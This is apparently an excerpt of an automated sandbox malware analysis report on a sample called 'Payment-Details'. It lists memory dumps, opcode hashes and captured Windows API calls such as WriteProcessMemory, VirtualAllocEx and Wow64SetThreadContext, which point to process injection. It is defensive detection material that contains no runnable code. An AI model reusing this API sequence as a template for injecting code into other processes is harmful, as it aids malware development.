                                        • Instruction ID: be1d099c5f5e6804f5e7a960706d219d0217581f1415192c01baedc4628023e3
                                        • Opcode Fuzzy Hash: dd29d55e723fc6805ea7a8e3163936285a9d0782635caeca25ef66bc46b2887e
                                        • Instruction Fuzzy Hash: E3418471C00359AFDB20CFAAD885BDEBBF1BF08710F14C42AE814A7244CB758895CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0636435F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFileMapping
                                        • String ID:
                                        • API String ID: 524692379-0
                                        • Opcode ID: 699d24b429d2e55c8d142d9f59f1cf31319a7e3f8188f6ab4a3f102cfe4ffcc9
                                        • Instruction ID: b28e0b06eb979ae9f8d2ca71bede012d8b3a4bd306b1bda1f79701fb96e68af8
                                        • Opcode Fuzzy Hash: 699d24b429d2e55c8d142d9f59f1cf31319a7e3f8188f6ab4a3f102cfe4ffcc9
                                        • Instruction Fuzzy Hash: C6417270D00309AFDB64CFAAD8857DEBBF1BF48710F20C529E819A7244CB749895CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0636435F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFileMapping
                                        • String ID:
                                        • API String ID: 524692379-0
                                        • Opcode ID: 1f7f5095911bdca602542059827170f51a3aa83bc955824414050102f6d64e3a
                                        • Instruction ID: 925d5fd8dd2c80cc9e2a2e2cbe7ca023e7b81ca0fc0be3c9e70a50f922e2f7b6
                                        • Opcode Fuzzy Hash: 1f7f5095911bdca602542059827170f51a3aa83bc955824414050102f6d64e3a
                                        • Instruction Fuzzy Hash: 14416370D00349EFDB64CFAAC88579EBBF1BF48710F24C529E819AB244DB759855CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06364199
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: e5573768290a07db119b75d3430486e537536b1fe0de15f06fde4d8db0766bc7
                                        • Instruction ID: ab15e8cc41e3f2fad44701ed943fcedebdb93a151e90a0362739fe2ef444fb23
                                        • Opcode Fuzzy Hash: e5573768290a07db119b75d3430486e537536b1fe0de15f06fde4d8db0766bc7
                                        • Instruction Fuzzy Hash: 3D416571D003599FDB20DFAAC885BDEBBF1BF48710F14C42AE815A7254CB758895CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 991bb2639317823448be888ee2d35adab7143f34e980e2914e4ea77730a20b75
                                        • Instruction ID: 4c6bab9fed6e86e6fe3331d0c04895eda634512b7b7abcd88226876b44095d5c
                                        • Opcode Fuzzy Hash: 991bb2639317823448be888ee2d35adab7143f34e980e2914e4ea77730a20b75
                                        • Instruction Fuzzy Hash: 6CD16B71700602CFCB14DF28C88496AB7FAFF89310B29CA69D45A9B355DB34F846CB91

                                        Control-flow Graph

                                        control_flow_graph 1317 63630f8-636314e 1320 6363150-636315c 1317->1320 1321 636315e-636319d WriteProcessMemory 1317->1321 1320->1321 1323 63631a6-63631d6 1321->1323 1324 636319f-63631a5 1321->1324 1324->1323
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06363190
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0

                                        Control-flow Graph

                                        control_flow_graph 1328 6364538-63645d9 DuplicateHandle 1332 63645e2-6364612 1328->1332 1333 63645db-63645e1 1328->1333 1333->1332
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 063645CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06363190
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 063645CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06362C5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06363564
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06362C5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06363564
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 063644AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: FileView
                                        • String ID:
                                        • API String ID: 3314676101-0
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 072CDAF4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693344911.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_72c0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0636306E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 063644AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: FileView
                                        • String ID:
                                        • API String ID: 3314676101-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0636306E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 072CEB63
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693344911.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_72c0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :JZ_
                                        • API String ID: 0-2019505780
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '
                                        • API String ID: 0-1997036262
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 9
                                        • API String ID: 0-2366072709
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: v
                                        • API String ID: 0-1801730948
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b05c617bb193a6a130adb28188ae83d52060115c2673a8b7a35b2766cf16cfc
                                        • Instruction ID: 3ac720c21b1edf7b4d18bc6fb40ebd192c89489ff76a9d8dd08a26982edbac66
                                        • Opcode Fuzzy Hash: 2b05c617bb193a6a130adb28188ae83d52060115c2673a8b7a35b2766cf16cfc
                                        • Instruction Fuzzy Hash: EA227BB5A10206DFDB04CFA4D994A6AB7F6BF88300F158159E905EB3A5CB75ED40CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82e3df44e88d40db8124d40b6cdee399d7a01a2ba05534761109d927ee5b87e6
                                        • Instruction ID: f0fa474ea41b78af34fc9b3355be3d07503c219d41b492d1bd287eb5bbb61248
                                        • Opcode Fuzzy Hash: 82e3df44e88d40db8124d40b6cdee399d7a01a2ba05534761109d927ee5b87e6
                                        • Instruction Fuzzy Hash: 0B227FB1E1021ACFDB15CFA4D854AAEBBB6FF48700F158159E801AB394DB789E41CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9af2a59060b2c62e323451d6c696d41827184987b3445f0ec6e905031b2ecc88
                                        • Instruction ID: 8d4928a27d8488cf886497465a674e60584e9c6db05ebe94d71b5b4c81368500
                                        • Opcode Fuzzy Hash: 9af2a59060b2c62e323451d6c696d41827184987b3445f0ec6e905031b2ecc88
                                        • Instruction Fuzzy Hash: 0C1237B4B10206CFDB14DF28C698A6AB7F6BF88711F1584A9E901DB361DB31EC41CB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e31d04cae25adcf9e68e62d343f0fc53cba0801a83b7b2953bdec9a3dba499d
                                        • Instruction ID: ef1235091e157612e66d5df484b1f7a2bf26e5043337c0573e65c6cb6ea7f6ef
                                        • Opcode Fuzzy Hash: 3e31d04cae25adcf9e68e62d343f0fc53cba0801a83b7b2953bdec9a3dba499d
                                        • Instruction Fuzzy Hash: 3D124AB1B00205DFDB64DFA5D884A6EB7FAFF88300F148669D40A9B794DB35AC45CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 293e7102f10fd03eb264ecd80a01ebe885649cdfd116537463df41b9e1a510de
                                        • Instruction ID: 4d36b5657d4c2d9bef00bdc7e0fc660e5494ae956b72c191ab63aafd5f680b9a
                                        • Opcode Fuzzy Hash: 293e7102f10fd03eb264ecd80a01ebe885649cdfd116537463df41b9e1a510de
                                        • Instruction Fuzzy Hash: BF22D1B4E01218CFCB54DFE5C8586ACBBB6FF8A305F508269C41AAB344DB749985CF15
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 039ccb61b1c24f767b3903b65cb914562a9eaedc9a58caa51d2728eb4e96b6e4
                                        • Instruction ID: 0ab58619c3ddd41fdd1b791faad88fc6b9db346ff9de162eac8b0cc3f7da6e77
                                        • Opcode Fuzzy Hash: 039ccb61b1c24f767b3903b65cb914562a9eaedc9a58caa51d2728eb4e96b6e4
                                        • Instruction Fuzzy Hash: DF1239B4A10219CFCB14EF64C894B9DB7B6BF89300F5186A9D44AAB365DB30ED85CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 917188dcf7d693d114621d43da168a57465a609cb225deaeb19c4b443fbd106a
                                        • Instruction ID: eda78f08de6fc533e5a9865adc46fb2a9f95457a5aec264f6e71d40f86c64436
                                        • Opcode Fuzzy Hash: 917188dcf7d693d114621d43da168a57465a609cb225deaeb19c4b443fbd106a
                                        • Instruction Fuzzy Hash: 35F1EA74A00219DFCB44DFA4D998A9DB7B6FF88300F118659E805AB3A5DB75FC42CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2639b05c5a533d9abe82424811ac49eccb2d7afa5dd8fc0a9abd351555a677a4
                                        • Instruction ID: 1ba98bea3c84bee3560bb01905955084f8ff9bcec111e3af3c34c2fd0b93dae8
                                        • Opcode Fuzzy Hash: 2639b05c5a533d9abe82424811ac49eccb2d7afa5dd8fc0a9abd351555a677a4
                                        • Instruction Fuzzy Hash: A8F1B2B4E0120CDFDB54DFA5D8986ADBBB6FF8A311F204229E816A7390DB345985CF05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16ea03da74f11f9b3b5a91590cec6fec8736cc41bc915a0f50069b81189ee5e7
                                        • Instruction ID: 8c20cce8efaadb2030b973402ea7f857f994aaec78acf78c19f34a37471e4b44
                                        • Opcode Fuzzy Hash: 16ea03da74f11f9b3b5a91590cec6fec8736cc41bc915a0f50069b81189ee5e7
                                        • Instruction Fuzzy Hash: 41A1F0B5B112069FDB05CFA4D494AADBBF6EF88311F15816AE811EB390CB39DD41CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58c9e670eb1362590e3bae10ca807fa1cd20f66ab3f85b50d5715cee2ecb4865
                                        • Instruction ID: 3149a56e82d811289e417f3f9202a77f27c77c80703917140b31e0f433f96774
                                        • Opcode Fuzzy Hash: 58c9e670eb1362590e3bae10ca807fa1cd20f66ab3f85b50d5715cee2ecb4865
                                        • Instruction Fuzzy Hash: 38A1D2B4E0020DCFCB58DFA5D4486ADBBB6FF89301F548269D81277290CB785982CF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5f3ee6da0c6307ee97a0056ad51c626e607ed9a7f074dc0514e51caefe080
                                        • Instruction ID: 06ad9799125dc4a38d9b90e83e79a218ae8aafed90e7e163f32a27d585d7a4f0
                                        • Opcode Fuzzy Hash: 57d5f3ee6da0c6307ee97a0056ad51c626e607ed9a7f074dc0514e51caefe080
                                        • Instruction Fuzzy Hash: 03A1D974A11209DFCB04EFA4E49499DBBB6FF89311F108269F802AB364DB34AD46CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 506d9509850adc959bca758484c7542723881b48faeccef44c408975db0bea22
                                        • Instruction ID: 26d47b7a129b8e4139196126223514ed78261f8af0540e8f72377dd1f0093877
                                        • Opcode Fuzzy Hash: 506d9509850adc959bca758484c7542723881b48faeccef44c408975db0bea22
                                        • Instruction Fuzzy Hash: 49A11D74A10219DFCB44EFA4D898A9DB7B6FF88300F158659E805AB365DB34FD42CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bc1b0ce4d90271a8a946e4c9fd12040d5a3c57a9cc73b1a3983f516384699c6
                                        • Instruction ID: 416233bd0ffab90efc5ef3ab198081f1b5e29ed5e1da927c6f627b880668f093
                                        • Opcode Fuzzy Hash: 2bc1b0ce4d90271a8a946e4c9fd12040d5a3c57a9cc73b1a3983f516384699c6
                                        • Instruction Fuzzy Hash: 1E915F31A00709EFDB04DFA9C854A9DBBB5FF88311F21856DE509AB361DB31AD45CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21e03a0f93e9c34a2577ed49cc92dfe51bc93e33ac7b5d4599c5f93798d04aa9
                                        • Instruction ID: a1b35f6768c86fe54181bd31078ecaadb71fc6de98800b76beb4ada65ff45991
                                        • Opcode Fuzzy Hash: 21e03a0f93e9c34a2577ed49cc92dfe51bc93e33ac7b5d4599c5f93798d04aa9
                                        • Instruction Fuzzy Hash: 64816CB4B20615DFCB04DF68D494A6DB7B6BF89710F148169E406DB3A6CB34ED02CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9230a6579f0c4f3c016777185a39632618c090f341bee792b806f50219b78947
                                        • Instruction ID: 7f4f8ccd1acb0c201018074830cee4d54ff3e852d1ed7f378ba7a8eabd7df2c6
                                        • Opcode Fuzzy Hash: 9230a6579f0c4f3c016777185a39632618c090f341bee792b806f50219b78947
                                        • Instruction Fuzzy Hash: 89718BF0A1060A8FDB14DFA9C9806AEFBF6FFC8300F248569D459A7754DB30AA01CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04ec46996f3060f43e133d1c5c70b0660d684948fb131cb94a7c517ddfe7032e
                                        • Instruction ID: a05e9f543d98afbbb3f2d9cef58eccdf6a201c78a5436a217b710c1786295b9c
                                        • Opcode Fuzzy Hash: 04ec46996f3060f43e133d1c5c70b0660d684948fb131cb94a7c517ddfe7032e
                                        • Instruction Fuzzy Hash: 937102B1A10246CFC704EF68C8959BABBF1FF86304B1545A9D445DB361DB38ED41CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5418d46d4cb00e74b75ca33beb6ce20c8b057d6becdc401b3b88ce5eda1367a0
                                        • Instruction ID: 4223c6e85ccf392edd70755758f6219e8e8d07853140c6e24302c938e9a8035d
                                        • Opcode Fuzzy Hash: 5418d46d4cb00e74b75ca33beb6ce20c8b057d6becdc401b3b88ce5eda1367a0
                                        • Instruction Fuzzy Hash: 9D8129B5A00215CFDB54DF68C584A9EB7F9FF88710B1582A9E856DB360DB31EC41CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc4cf9f233258c7261466a3e40d24ad40df31b59a6445a8e82988a0c1e9ef094
                                        • Instruction ID: b4b8310bfa4a1ee4d001019a3ee2e814369b827c6a1cb803b9844b8f8cd90792
                                        • Opcode Fuzzy Hash: fc4cf9f233258c7261466a3e40d24ad40df31b59a6445a8e82988a0c1e9ef094
                                        • Instruction Fuzzy Hash: 399155B1D15218CFDB50CFA4C855BEEBBB1FB4A300F1090AAD549A7352C7785A86CFA1
                                        Memory Dump Source
